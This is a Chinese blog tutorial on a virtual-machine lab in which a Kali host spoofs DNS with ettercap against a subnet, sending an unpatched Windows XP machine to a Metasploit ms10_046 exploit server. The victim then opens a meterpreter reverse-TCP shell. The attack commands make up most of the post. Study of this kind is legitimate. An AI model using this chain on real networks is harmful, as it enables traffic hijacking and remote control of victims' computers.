记一次虚拟机环境的dns劫持实验

最新推荐文章于 2024-07-30 18:48:34 发布
最新推荐文章于 2024-07-30 18:48:34 发布
阅读量1.1k 收藏 6
点赞数 3
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dlc0313/article/details/83899024
版权

环境,kali虚拟机和winXP虚拟机

 

XP虚拟机别打太多补丁,毕竟为了试验

首先,两台电脑都打开

 

接下来,对kali进行操作

首先查看ip和网卡

指令ifconfig

 

接着打开Metasploit命令行模式

指令msfconsole

 

选择漏洞利用攻击模块

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

 

然后配置攻击的参数

设置SRVHOST

set SRVHOST kali的ip

 

选择攻击载荷反弹ip模式

set PAYLOAD windows/meterpreter/reverse_tcp

 

设置LHOST

set LHOST kali的ip

 

通过exploit命令发起攻击

 

 

配置ettercap工具进行dns欺骗

编辑etter.dns

vim /etc/ettercap/etter.dns

注意 BT5和kali的etter位置不同,用bt5的请自行百度

添加A记录,如,使.com的域名全部被劫持

*.com A kali的ip

 

接下来就可以开始欺骗攻击了

ettercap -T -i 网卡编号 -q –P dns_spoof /// ///

这是对全网段进行欺骗

 

此时,xp虚拟机ping任何一个.com域名时,ping的ip都会变成kali的ip

当kali的msfconsole中显示Meterpreter session 1 opened时,说明已经攻击成功

此时可以输入sessions指令查看被攻击的主机

通过指令sessions –i 主机id号,可以对主机进行操作,比如输入shell指令,就可以通过shell控制目标机

黑暗巫妖
关注
专栏目录
DNS劫持攻击实验
文武老司机的博客
12-24 2173
DNS劫持攻击: 0x01 攻击目的: ​ 劫持靶机的DNS请求,将靶机所有的http请求流量都引导到攻击机搭建的web服务器(shadow website)供靶机访问。 0x02 环境介绍: ​ 攻击机:Kali linux ​ 靶机:ubuntu 20.04 ​ 存在形式:vmware之虚机 ​ 联网方式:NAT ​ IP地址: ​ Gateway:192.168.8.2/24 ​ Kali linux:192.168.8.128/24 ​
ettercap内网DNS劫持实验
向往天空的鱼
05-11 1389
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。 ARP欺骗是一种中间人攻击,攻击者通过毒化受害者的ARP缓存,将网关的MAC替换成攻击者的MAC,于是攻击者的主机实际上就充当了受害主机的网关,之后攻击者就可以截获受害者发出和接到的数据包,从中获取账号密码、银行卡信息等。 ...
ARP欺骗与DNS劫持实验详解
最新发布
weixin_67832625的博客
07-30 407
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
计算机网络 day14 DNS域名劫持DNS域名污染 - CDN的工作流程 - DNS录类型 - 搭建DNS缓存/主域名服务器 - DNAT-SNAT实验项目
lpfstudy的博客
07-28 2365
CDN使用Anycast技术,将相同的IP地址分配给全球不同地区的服务器节点,用户请求将导向离用户最近的服务器,从而实现高效的内容交付。CDN提供商会在DNS解析层面进行优化,通过返回离用户最近的CDN节点的IP地址,将用户的请求导向最近的节点,从而实现就近访问。本地DNS服务器会将DNS解析请求发送给CDN加速DNS,并由CDN加速DNS返回离用户最近的CDN节点的IP地址,而不是源服务器的IP地址。CDN会在边缘节点上缓存动态内容的副本,并与源服务器进行实时同步,以确保用户获取最新的内容。
劫持DNS通过流量植入木马实验
Uzizi的博客
06-01 1388
劫持DNS通过流量植入木马实验
网络攻防之ARP欺骗和DNS劫持实验
m0_62574258的博客
02-24 2510
实验环境:攻击主机:kali2023虚拟机,IP地址为192.168.133.141靶机:Windows10虚拟机,IP地址为192.168.133.129网关地址:192.168.133.2(1)ARP协议介绍在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。这个目标主机的MAC地址就是通过地址解析协议ARP获得的。ARP协议中通常有两种数据包:ARP请求包和ARP应答包。
Windows实验——DNS劫持演练
浅浅的博客
03-08 4325
一、实验环境 钓鱼网站:虚拟机Windows Server 2008的缺省网站 IP:192.168.43.44 攻击者:物理机Win 10 IP:192.168.43.89 被攻击者:物理机Win 7 ...
python实现dns劫持_Python程序之DNS劫持
weixin_39530557的博客
12-15 828
实验环境:虚假网站端:虚拟机Windowsserver 2008攻击机:Windows7靶机端:Windows10实验步骤:设置虚拟机网络适配器为桥接模式虚拟机设备设置 编辑虚拟网络编辑器 查询Windowsserver 2008的IP地址并搭建自己的网站 新建一个自己的网站(即攻击后劫持网站)编写DNS劫持代码from scapy.all import *import sysimp...
DNS原理及实验
weixin_44841019的博客
04-17 3356
目录一、DNS域名系统二、DNS域名结构三、DNS服务器类型四、构建DNS域名解析服务器 一、DNS域名系统 1、DNS定义:DNS是“域名系统”的英文缩写。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。 2、DNS使用端口:DNS服务使用TCP和UDP的53端口,TCP的53端口用于连接DNS服务器,UDP的53端口用于解析DNS。 3、DNS域名长度限制:每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符 4、DNS作用: 正向解析:根据域名查找对应
DNS劫持如何预防、DNS是什么?DNS劫持详解
douya0012的博客
01-04 1554
在前两天的时候,打开www.linux.org的时候突然发现,页面跟原来完全不一样了,里面各种fk,第一反应就是网站被黑了,攻击者对于该站非常不满,还有一张“菊花图”,场面异常火爆,有兴趣可看这个报道。后来网站官方说网站被黑是一起DNS劫持事件,对于网站被黑感到啼笑之余,也同时让我好奇DNS劫持到底是什么,攻击威力如此大。 DNS是什么 DNS是Domain Name System的缩写, 我们称之域名系统。首先它是远程调用服务,本地默认占用53端口,它本身的实质上一个域名和ip的数据库服务器,他要完成的
vulhub通关实战一(附docker vulhub 虚拟机环境
悦分享
12-26 1593
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
netkit-ng+bind+scapy的旁路抢答DNS污染实验报告
12-24
1.使用工具“netkit-ng”在虚拟机(kali linux 2016 amd64)里搭建模拟的网络环境 2.使用python的scapy模块伪造DNS应答包,并发送给DNS缓存服务器(dns-local),从而污染DNS缓存服务器的缓存录,使客户端(client)在访问域名“facebook.com”时,接收到来自DNS缓存服务器的已被攻击者污染的地址录。最后使客户端实际访问到的是攻击者的web服务器(attserver)中的网页。
DNS劫持录)
weixin_44300286的博客
11-26 371
一、什么是DNS欺骗 DNS(英文:Domain Name System)域名系统,主要用来把域名(domain name)转换为与之相对应的IP地址 (IP address)。 DNS工作原理: 1、客户端输入域名,查询本地缓存 2、本地DNS服务器查询,本地DNS服务器内部缓存 3、本地DNS向根域名服务器查询,根域服务器返回一级域地址 4、本地DNS向根域返回的一级域服务器查询,一级域的本地缓存 5、查询到终结果,返回给本地DNS服务器 6、本地DNS服务器,将解析的结果返回客户端 7、客户端根据返回
DNS污染实验
2201_75772809的博客
12-29 185
DNS劫持
qq_61142406的博客
02-13 3415
均在本地模拟,请不要用于非法途径 小白学习,如有错误或者建议还请提出 先了解一下dns协议,当然dns也能做隐藏隧道,,,后续写上 DNS协议是用来将域名转换为IP地址(也可以将IP地址转换为相应的域名地址) dns劫持实验环境Windows10(靶机) 192.168.64.139,kali Linux(攻击机) 192.168.64.133 均为NAT模式,保证在同一个网关,能够通信,可以用ping测试(windows默认ping四次,Linux默认一直ping,可以加一个参数 -c 来指定
网络安全 - DNS劫持原理 + 实验
z339521的博客
06-14 2625
DNSDNS(Domain Name System)即域名系统。我们常说的 DNS域名解析协议。DNS 协议提供域名到 IP 地址之间的解析服务。计算机既可以被赋予 IP 地址,也可以被赋予主机名和域名。用户通常使用主机名或域名来访问对方的计算机,而不是直接通过 IP 地址访问。因为与 IP 地址的一组纯数字相比,用字母配合数字的表示形式来指定计算机名更符合人类的忆习惯。但要让计算机去理解名称,相对而言就变得困难了。因为计算机更擅长处理一长串数字。
DNS抢答劫持检测
gsls200808的专栏
06-06 2823
最近发现改了 DNS 之后还会被劫持,所以简单分析了一下。 114DNS检测命令 nslookup whether.114dns.com 114.114.114.114 如果返回结果是127.0.0.1,那么肯定是抢答或者劫持 如果返回其他结果,比如58.217.249.139,那么基本可以保证是正常的。 本地异网DNS检测多线网站如百度,如果结果返回的是同样的IP并且是同一运营商,那么也可以确定是抢答 以沈阳为例,沈阳三大运营商DNS为 #沈阳联通DNS 202.96.64.68 202
DNS缓存污染实验】 SEED LAB 远程DNS 缓存中毒--Kaminsky 攻击复现
PsgQ的博客
04-11 3462
SEED LAB 远程DNS 缓存中毒–Kaminsky 攻击复现 0x00 搭建实验环境 使用3台Ubuntu 16.04虚拟机,可到下面的参考链接下载 攻击的服务是BIND9,由于条件限制,这里使用本地的一台虚拟机当作远程DNS解析器,关闭了DNSSEC服务,其中三台机器IP地址,如下图所示: 具体的实验环境搭建过程,可参考:SEED Lab Description 配置User VM: 在用户机 的 /etc/resolvconf/resolv.conf.d/head文件中,加入下面语句,将
"Linux虚拟机环境下安装及基础命令实验
本次实验的目的是为了让学生掌握在虚拟机环境下安装Linux系统的方法,并且熟练掌握基本shell命令以及高级操作。实验所需的开发工具和运行环境包括Vmware15虚拟机和Centos7的iso镜像文件。在实验中,学生需要完成以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值